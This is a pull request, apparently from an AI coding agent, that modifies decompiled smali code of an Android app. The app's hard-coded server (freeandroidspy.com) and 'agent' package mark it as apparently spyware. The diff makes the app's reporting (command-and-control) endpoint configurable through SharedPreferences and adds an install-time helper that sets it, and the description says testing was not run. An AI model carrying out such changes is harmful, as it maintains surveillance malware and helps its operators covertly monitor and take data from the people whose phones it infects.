### PR TITLE
Add configurable endpoint preference

### DIFF
--- a/smali/com/hp/vd/agent/Configuration.smali
+++ b/smali/com/hp/vd/agent/Configuration.smali
@@ -72,8 +72,8 @@
     return v0
 .end method
 
-.method public getEndpoints()[Ljava/net/URI;
-    .locals 3
+.method public getEndpoints(Landroid/content/Context;)[Ljava/net/URI;
+    .locals 6
 
     const/4 v0, 0x1
 
@@ -82,12 +82,49 @@
 
     const-string v1, "https://server.freeandroidspy.com:443/index.php"
 
+    const/4 v2, 0x0
+
+    if-eqz p1, :cond_2
+
+    const-string v3, "system"
+
+    const/4 v4, 0x0
+
     .line 174
+    invoke-virtual {p1, v3, v4}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
+
+    move-result-object v3
+
+    if-eqz v3, :cond_2
+
+    const-string v5, "server_endpoint"
+
+    invoke-interface {v3, v5}, Landroid/content/SharedPreferences;->contains(Ljava/lang/String;)Z
+
+    move-result v4
+
+    if-eqz v4, :cond_2
+
+    const-string v4, ""
+
+    invoke-interface {v3, v5, v4}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
+
+    move-result-object v3
+
+    if-eqz v3, :cond_2
+
+    invoke-virtual {v3}, Ljava/lang/String;->length()I
+
+    move-result v4
+
+    if-lez v4, :cond_2
+
+    move-object v1, v3
+
+    :cond_2
     invoke-static {v1}, Ljava/net/URI;->create(Ljava/lang/String;)Ljava/net/URI;
 
     move-result-object v1
-
-    const/4 v2, 0x0
 
     aput-object v1, v0, v2
 
@@ -287,6 +324,29 @@
     move-result-object v1
 
     iput-object v1, v0, Lcom/hp/vd/data/SystemData;->session:Ljava/lang/String;
+
+    const-string v1, "https://server.freeandroidspy.com:443/index.php"
+
+    const-string v2, "server_endpoint"
+
+    const-string v3, ""
+
+    invoke-interface {p1, v2, v3}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
+
+    move-result-object v2
+
+    if-eqz v2, :cond_2
+
+    invoke-virtual {v2}, Ljava/lang/String;->length()I
+
+    move-result v3
+
+    if-lez v3, :cond_2
+
+    move-object v1, v2
+
+    :cond_2
+    iput-object v1, v0, Lcom/hp/vd/data/SystemData;->endpoint:Ljava/lang/String;
 
     const-string v1, "initial_wakeup_delay"
 

--- a/smali/com/hp/vd/agent/InstallHelper.smali
+++ b/smali/com/hp/vd/agent/InstallHelper.smali
@@ -182,6 +182,56 @@
     return v1
 .end method
 
+.method public static setEndpoint(Landroid/content/Context;Ljava/lang/String;)V
+    .locals 3
+
+    const-string v0, "system"
+
+    const/4 v1, 0x0
+
+    invoke-virtual {p0, v0, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
+
+    move-result-object p0
+
+    if-nez p0, :cond_0
+
+    return-void
+
+    .line 37
+    :cond_0
+    invoke-interface {p0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
+
+    move-result-object v0
+
+    const-string v1, "server_endpoint"
+
+    if-eqz p1, :cond_1
+
+    invoke-virtual {p1}, Ljava/lang/String;->length()I
+
+    move-result v2
+
+    if-lez v2, :cond_1
+
+    move-object v2, p1
+
+    goto :goto_0
+
+    :cond_1
+    const-string v2, "https://server.freeandroidspy.com:443/index.php"
+
+    :goto_0
+    invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
+
+    move-result-object v0
+
+    invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
+
+    move-result v0
+
+    return-void
+.end method
+
 .method public static isNetworkAvailable(Landroid/content/Context;)Z
     .locals 1
 

--- a/smali/com/hp/vd/connection/Basic.smali
+++ b/smali/com/hp/vd/connection/Basic.smali
@@ -44,16 +44,15 @@
     invoke-direct {v1}, Lcom/hp/vd/agent/Configuration;-><init>()V
 
     .line 26
-    invoke-virtual {v1}, Lcom/hp/vd/agent/Configuration;->getEndpoints()[Ljava/net/URI;
-
-    move-result-object v1
-
-    .line 32
     iget-object v2, p0, Lcom/hp/vd/connection/Basic;->context:Lcom/hp/vd/context/Context;
 
     invoke-virtual {v2}, Lcom/hp/vd/context/Context;->getApplicationContext()Landroid/content/Context;
 
     move-result-object v2
+
+    invoke-virtual {v1, v2}, Lcom/hp/vd/agent/Configuration;->getEndpoints(Landroid/content/Context;)[Ljava/net/URI;
+
+    move-result-object v1
 
     const-string v3, "connectivity"
 
@@ -431,8 +430,14 @@
 
     invoke-direct {v0}, Lcom/hp/vd/agent/Configuration;-><init>()V
 
+    iget-object v1, p0, Lcom/hp/vd/connection/Basic;->context:Lcom/hp/vd/context/Context;
+
+    invoke-virtual {v1}, Lcom/hp/vd/context/Context;->getApplicationContext()Landroid/content/Context;
+
+    move-result-object v1
+
     .line 103
-    invoke-virtual {v0}, Lcom/hp/vd/agent/Configuration;->getEndpoints()[Ljava/net/URI;
+    invoke-virtual {v0, v1}, Lcom/hp/vd/agent/Configuration;->getEndpoints(Landroid/content/Context;)[Ljava/net/URI;
 
     move-result-object v0
 

--- a/smali/com/hp/vd/data/SystemData.smali
+++ b/smali/com/hp/vd/data/SystemData.smali
@@ -10,6 +10,8 @@
 
 .field public cpuSerial:Ljava/lang/String;
 
+.field public endpoint:Ljava/lang/String;
+
 .field public heartbeatInterval:Ljava/lang/Integer;
 
 .field public identifier:Ljava/lang/String;


### PR DESCRIPTION
## Summary
- allow Configuration.getEndpoints to read an override from SharedPreferences and expose it via SystemData
- update Basic connection manager to provide the application context when resolving endpoints
- add an InstallHelper utility to save the configured server endpoint during setup

## Testing
- not run


------
https://chatgpt.com/codex/tasks/task_e_68cf1108297083289dc7fa955bad32ca